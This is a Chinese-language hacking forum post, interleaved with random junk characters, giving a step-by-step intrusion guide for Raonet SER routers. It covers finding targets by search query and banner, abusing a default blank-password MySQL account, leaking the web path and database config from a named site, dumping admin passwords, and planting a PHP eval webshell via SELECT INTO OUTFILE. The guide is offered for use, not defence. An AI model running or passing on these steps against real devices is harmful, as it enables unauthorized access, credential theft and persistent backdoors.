寻找存在漏洞的路由器方法:
$ C# F: X! `+ G" `, P" ?
! F& @+ e9 n5 h3 r$ F1:google搜索'Raonet Subscriber Ethernet Router'
4 p; ^4 _: ?5 w
9 H1 m! ^0 k. f2 E+ s0 _2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001+ J$ F$ O9 ]# V; M! a# f
; b7 x9 d3 o5 V9 W, z3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。4 p% P' c# [. d
6 H' d* W: K# _9 B- T' N' U3 J
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......6 |6 e5 O& K& J5 R& B. t2 H
6 q# w' }) ^( o: h$ g
7 n, }4 \" h K) X0 C0 K
& ]: ~( k5 } y' J0 s: e1 j* {
入侵步骤:. D: v! F. \ p8 a
, p" C' |0 \% Y$ [+ ]1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
2 v7 L4 r6 o+ l4 s7 I& w
9 `4 c0 ~* Z, X$ ^2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
7 u8 Z: h5 N' X6 m5 M& ?! } C7 p3:得到密码后连接,查看GUI管理密码:# f) ~. _3 y s* W) s; N7 A
use ser_500
7 G8 L* Y% {4 E. i) pselect id,passwd from user;
, X* X6 t5 E0 Y( m4:通过数据库写入webshell,执行命令:) S) I* N8 |% t3 j9 Q
use mysql;0 C5 E; l4 C4 n
create table ok(cmd TEXT);9 F j) j+ W$ L' t8 c
insert into ok values("<?php @eval($_POST[cmd])?>");# n- p; r$ {7 |) ]7 L
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
5 s0 |1 C3 c# I) \ Cdrop table ok;
" a0 P! G& \; a! Q/ `
1 x3 r/ L+ U) `. T7 L5:连接后门shell.php . u- A9 {/ r1 q+ I
5 m& A5 |2 _3 _) Q& y. M6. 搞定!
) X& i* D+ d/ p) m* V) Z6 L0 A; [& Q, c( |& o
|